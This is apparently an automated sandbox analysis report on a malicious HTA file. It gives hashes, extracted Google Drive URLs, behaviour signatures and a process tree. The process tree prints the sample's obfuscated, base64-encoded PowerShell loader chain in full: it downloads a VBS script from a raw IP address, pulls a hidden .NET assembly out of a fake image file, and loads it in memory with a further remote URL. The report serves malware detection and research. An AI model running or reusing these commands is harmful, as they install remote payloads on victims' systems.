Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
28-10-2024 02:47
Static task
static1
Behavioral task
behavioral1
Sample
7910bb1786288ed1cc204913f0785c32a1bd0b1ee3476d2ef260df564be3b2a5.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
7910bb1786288ed1cc204913f0785c32a1bd0b1ee3476d2ef260df564be3b2a5.hta
Resource
win10v2004-20241007-en
General
-
Target
7910bb1786288ed1cc204913f0785c32a1bd0b1ee3476d2ef260df564be3b2a5.hta
-
Size
131KB
-
MD5
63c86bc9c616e32406ec965054e9d4b0
-
SHA1
d1a0215e7fa42f4a994228d9cf86ac0a9e3ccebe
-
SHA256
7910bb1786288ed1cc204913f0785c32a1bd0b1ee3476d2ef260df564be3b2a5
-
SHA512
15109c6afb31ea10c80b8d3b02eede606d3b2f7f50f55046431b526ec52a9ee0a9ef0328a72dad288e6d11dd5eb2b21f43ecc83a999d03b2886c5926a7606d01
-
SSDEEP
96:Eam7Xy1+49+cxfj3+dn8HQKozLnm+/07T:Ea2Xy1l9qdQQ7LnmIaT
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2820 PoWersHeLL.EXe 6 1776 powershell.exe 8 1776 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1776 powershell.exe 2260 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2820 PoWersHeLL.EXe 2852 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PoWersHeLL.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2820 PoWersHeLL.EXe 2852 powershell.exe 2820 PoWersHeLL.EXe 2820 PoWersHeLL.EXe 2260 powershell.exe 1776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2820 PoWersHeLL.EXe Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 2260 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2160 wrote to memory of 2820 2160 mshta.exe 30 PID 2160 wrote to memory of 2820 2160 mshta.exe 30 PID 2160 wrote to memory of 2820 2160 mshta.exe 30 PID 2160 wrote to memory of 2820 2160 mshta.exe 30 PID 2820 wrote to memory of 2852 2820 PoWersHeLL.EXe 32 PID 2820 wrote to memory of 2852 2820 PoWersHeLL.EXe 32 PID 2820 wrote to memory of 2852 2820 PoWersHeLL.EXe 32 PID 2820 wrote to memory of 2852 2820 PoWersHeLL.EXe 32 PID 2820 wrote to memory of 2044 2820 PoWersHeLL.EXe 33 PID 2820 wrote to memory of 2044 2820 PoWersHeLL.EXe 33 PID 2820 wrote to memory of 2044 2820 PoWersHeLL.EXe 33 PID 2820 wrote to memory of 2044 2820 PoWersHeLL.EXe 33 PID 2044 wrote to memory of 2596 2044 csc.exe 34 PID 2044 wrote to memory of 2596 2044 csc.exe 34 PID 2044 wrote to memory of 2596 2044 csc.exe 34 PID 2044 wrote to memory of 2596 2044 csc.exe 34 PID 2820 wrote to memory of 2292 2820 PoWersHeLL.EXe 36 PID 2820 wrote to memory of 2292 2820 PoWersHeLL.EXe 36 PID 2820 wrote to memory of 2292 2820 PoWersHeLL.EXe 36 PID 2820 wrote to memory of 2292 2820 PoWersHeLL.EXe 36 PID 2292 wrote to memory of 2260 2292 WScript.exe 37 PID 2292 wrote to memory of 2260 2292 WScript.exe 37 PID 2292 wrote to memory of 2260 2292 WScript.exe 37 PID 2292 wrote to memory of 2260 2292 WScript.exe 37 PID 2260 wrote to memory of 1776 2260 powershell.exe 39 PID 2260 wrote to memory of 1776 2260 powershell.exe 39 PID 2260 wrote to memory of 1776 2260 powershell.exe 39 PID 2260 wrote to memory of 1776 2260 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\7910bb1786288ed1cc204913f0785c32a1bd0b1ee3476d2ef260df564be3b2a5.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\SysWOW64\wIndOWSpOweRsHEll\V1.0\PoWersHeLL.EXe"C:\Windows\SyStEm32\wIndOWSpOweRsHEll\V1.0\PoWersHeLL.EXe" "PowErSheLL -Ex BYpass -nop -W 1 -C dEViceCreDeNtialDeplOyMENT ; iEx($(IEx('[SYSTeM.teXt.encODInG]'+[ChaR]0X3A+[CHAr]58+'uTF8.GEtsTrING([SYSTEM.conVErT]'+[ChAr]58+[CHAR]58+'FrOMBASe64strING('+[ChAR]0X22+'JDBubWZjSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJkRUZpbkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNYeWUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVxVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWR2WFFpV2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbEpIZm9adlRlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZ0paKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqRmd3b2pjYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDSW5jSFhUYndIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDBubWZjSTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni8zOC9naXZpbmdiZXN0dGhpbmdzd2l0aGdvb2RuZXdzZ3JlYXRkYXloYXZlLnRJRiIsIiRlblY6QVBQREFUQVxnaXZpbmdiZXN0dGhpbmdzd2l0aGdvb2RuZXdzZ3JlYXRkYXkudmJTIiwwLDApO3NUQVJULVNsZUVQKDMpO3NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcZ2l2aW5nYmVzdHRoaW5nc3dpdGhnb29kbmV3c2dyZWF0ZGF5LnZiUyI='+[ChAr]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpass -nop -W 1 -C dEViceCreDeNtialDeplOyMENT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ihv3tlwx.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES677B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC677A.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2596
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\givingbestthingswithgoodnewsgreatday.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnQzVKaW1hZ2VVcmwgPSBVSnRodHRwczovL2RyaXZlLicrJ2dvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBVSnQ7QzVKd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtDNScrJ0ppbWFnZUJ5dGVzID0gQzVKd2ViQ2xpZW50LkRvd25sb2FkRGF0YShDNUppbWFnZVVybCcrJyk7QzVKaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoQzVKaW1hZ2VCeXRlcyk7QzUnKydKc3RhcnRGbGFnID0gVUp0PDxCQVNFNjRfU1RBUlQ+PlVKdDtDNUplbmRGbGFnID0gVUp0PDxCQVNFNjRfRU5EPj5VSnQ7QzVKc3RhcnRJbmRleCA9IEM1SmltYWdlVGV4dC5JbmRleE9mJysnKEM1SnN0YXJ0RmxhJysnZyk7QzVKZW5kSW5kZXggPSBDNUppbWFnZVRleHQuSW5kZXhPZihDNUplbmRGbGFnKTtDNUpzdGFydEluZGV4IC1nZSAwIC1hbmQgQzVKZW5kSW5kZXggLWcnKyd0JysnIEM1SnN0YXJ0SW5kZXgnKyc7QzVKc3RhcnRJJysnbmRleCArPSBDNUpzdGFydEZsYWcuTGVuJysnZ3RoO0M1SmJhc2U2NExlbmd0aCA9IEM1SmVuZEluZGV4IC0gQzVKc3RhcnRJbmRleDtDNUpiYXNlNjQnKydDb21tYW5kID0gQzVKaW1hZ2VUZXh0LlN1JysnYnN0cmluZyhDNUpzdGFyJysndEluZGV4LCBDNUpiYXNlNjRMZW5ndGgpO0M1SmJhc2U2NFJldmVyc2VkID0gLWpvaW4gJysnKEM1SmJhc2U2NENvbW1hbmQuVG9DaCcrJ2FyJysnQXJyYXkoKSAwdG8gRm9yRWFjaC1PYmplY3QgeyBDNUpfIH0pWy0xLi4tKEM1SmJhc2U2NCcrJ0NvbW1hbmQuTGVuZ3RoKV07QzVKY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnInKydvbUJhc2U2NFN0cicrJ2luZyhDNUpiYXNlNjRSZXZlcnNlZCk7QzVKbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEM1SmNvbW1hbmRCeXRlcyk7QzVKdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChVSnRWQUlVSnQpO0M1SnZhaU1ldGhvZC5JbnZva2UoQzVKbnVsbCwgQChVSnR0eHQuRkRSUkNMLzgzLzY2MS41MzEuNTQyLjI3MScrJy8vOnB0dGhVJysnSnQsIFVKdGRlc2F0aXZhZG9VSnQsIFVKdGRlc2F0aXZhZG9VSnQsIFVKdGRlc2F0aXZhZG9VSnQsIFVKdGFzcG5ldF9yZWdicm93c2Vyc1VKdCwgVUp0ZGVzYXRpdmFkb1VKdCwgVUp0ZGVzYXRpdmFkb1VKdCxVSnRkZXNhdGl2YWRvVUp0LFVKdGRlc2F0aXZhZG9VSnQsVUp0ZGVzYXRpdmFkbycrJ1VKdCxVSnRkZXNhJysndGl2YWRvVUp0LFVKdGRlc2F0aXZhZG9VSnQsVUp0MVVKdCxVSnRkZXNhdGl2YWRvVUp0KSk7JyktQ3JlcGxhQ2UgICdVSnQnLFtjSEFyXTM5IC1DcmVwbGFDZShbY0hBcl00OCtbY0hBcl0xMTYrW2NIQXJdMTExKSxbY0hBcl0xMjQgLUNyZXBsYUNlICAoW2NIQXJdNjcrW2NIQXJdNTMrW2NIQXJdNzQpLFtjSEFyXTM2KSB8LiggJHNoZWxsSWRbMV0rJHNIRUxMSURbMTNdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('C5JimageUrl = UJthttps://drive.'+'google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur UJt;C5JwebClient = New-Object System.Net.WebClient;C5'+'JimageBytes = C5JwebClient.DownloadData(C5JimageUrl'+');C5JimageText = [System.Text.Encoding]::UTF8.GetString(C5JimageBytes);C5'+'JstartFlag = UJt<<BASE64_START>>UJt;C5JendFlag = UJt<<BASE64_END>>UJt;C5JstartIndex = C5JimageText.IndexOf'+'(C5JstartFla'+'g);C5JendIndex = C5JimageText.IndexOf(C5JendFlag);C5JstartIndex -ge 0 -and C5JendIndex -g'+'t'+' C5JstartIndex'+';C5JstartI'+'ndex += C5JstartFlag.Len'+'gth;C5Jbase64Length = C5JendIndex - C5JstartIndex;C5Jbase64'+'Command = C5JimageText.Su'+'bstring(C5Jstar'+'tIndex, C5Jbase64Length);C5Jbase64Reversed = -join '+'(C5Jbase64Command.ToCh'+'ar'+'Array() 0to ForEach-Object { C5J_ })[-1..-(C5Jbase64'+'Command.Length)];C5JcommandBytes = [System.Convert]::Fr'+'omBase64Str'+'ing(C5Jbase64Reversed);C5JloadedAssembly = [System.Reflection.Assembly]::Load(C5JcommandBytes);C5JvaiMethod = [dnlib.IO'+'.Home].GetMethod(UJtVAIUJt);C5JvaiMethod.Invoke(C5Jnull, @(UJttxt.FDRRCL/83/661.531.542.271'+'//:ptthU'+'Jt, UJtdesativadoUJt, UJtdesativadoUJt, UJtdesativadoUJt, UJtaspnet_regbrowsersUJt, UJtdesativadoUJt, UJtdesativadoUJt,UJtdesativadoUJt,UJtdesativadoUJt,UJtdesativado'+'UJt,UJtdesa'+'tivadoUJt,UJtdesativadoUJt,UJt1UJt,UJtdesativadoUJt));')-CreplaCe 'UJt',[cHAr]39 -CreplaCe([cHAr]48+[cHAr]116+[cHAr]111),[cHAr]124 -CreplaCe ([cHAr]67+[cHAr]53+[cHAr]74),[cHAr]36) |.( $shellId[1]+$sHELLID[13]+'X')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54c000700e4e65c56a352ba2ed3523f1d
SHA1a174141fd36d75ad391e4478f9db6e1cbd31d688
SHA256c3006f0c262b124e21ecc84a4715b19073b23f90625762518ce26ed389288095
SHA512d810005871f88b6b0f98f39311829f1ee2e91616684fe0399f5baf9f2f75ecc3d9b6a0406e656f44068c1fc8a141fab9a60f0e40db4aad828b4c1b3140cb0c2b
-
Filesize
3KB
MD53f9c7a6fff0674ce0c419b6e2727e9cb
SHA16593bfbb471ddd30c7199ef46724a456ca3d829b
SHA2560a4620e4f8d11750e91f93a2c29a7ae561b86c71e6002e25749ba74ab5713ade
SHA512825b58afeec4eabfce4ae5880dcbc1661c258aa3611f793e5eeaac843bcd3f8216fc28e19090c31717a8224552d84aab0c7083c3448277bfcacd36b33181595b
-
Filesize
7KB
MD51dc2e745756c98506e4373c8ec5058ac
SHA1a950fb03a9fac3f29ec752d262913a533d7d8aee
SHA256c4e26dc249a9ae7a2b19c85b738303b2d4f0044fd1c0d19dca2012104893ff7f
SHA512a472000ff0f97ab4a252f06aa530d2380b4f4984975b227953eafa6e1e3d6a59d1ebbd4afe9e8d3070df4d281d0636612e7c565817e5eef9a3638b82ae0f5c74
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5952335680e97b50517c6c9f671204c57
SHA1e5a6eebd9442d806da1a12945b6dae8682ccdbc4
SHA25615fd0b35a85f1869ba5d4132cf7267f8249696102fa66a4c20316570e52a9fcc
SHA512167426b399188796363aa84b3e35f402a1e5ff9ea2fc6a5c5fdeed518be03eff6f19990682c8f101b6b3bf2bb8d77e907303eea1593f10a08b35b6e910b8e0aa
-
Filesize
137KB
MD568b79df67d292d04c897d715cd185b31
SHA1a0b2b93da539502e992931456ccbe5c635457a90
SHA256ef8ab9fdbb2bb1032b5df226da1524dbb1cc691815c62be2a6aecf8d8e5ecfe4
SHA512cc774aac569f7bc0cf09ced183a0d2528a09bb02a8444a12550efc96a67ad2064ac65bdf33bf54267f44137e6a53ad01bf84501fa93f86203c802b975b5d4af8
-
Filesize
652B
MD5242d6618938dd40d7cbeb2d8963cc287
SHA1f85ae70af98d31b6851723b0c20cf9c8f867a644
SHA25689d948be0087d8447b70b17cfac1a0657bd87a6a589cb01dc416b8886f8d8260
SHA512da3e970f2d64c5891e510fc9cf49f1ac15eb8ac46f282958419182dfdb6cc73435ab192adef4d883812414570bf59e357e62efe560d12aff6d74f98457d14abe
-
Filesize
468B
MD57e9a725ff71e17a149e3f37de63e76f8
SHA1f3626671ffc98f98e94b7b8279cf93beb7492ba9
SHA2560a14b5effb9e1d22033fa329ac5f83debb151333841f7246ebb10900596cce3d
SHA51208803896174eabe8e6dce6accbf7f1fe4432ea0a82689b9ff09a1db27d71543ee306ad400d3503280c95d4c7b6838ef0154b1cb4bf0384bccba64a9294d93270
-
Filesize
309B
MD5eba51ce513473ea98b38afc0459512bf
SHA1b143d9fc455c3e2f4013118aab3af42d6b23b187
SHA256ba6a2d52c2427ed13c8d9a9f158ef93d6cdeb3990cd2534dc5bd8b636ef4234f
SHA51232360f5189cbc999cbe036f1600b2f45c671ca84104a99b0835ae5aaed487032cdeb8ed03783c92acfb2d32bfc99cde8638129274bc72105091cfcdd0170f7c0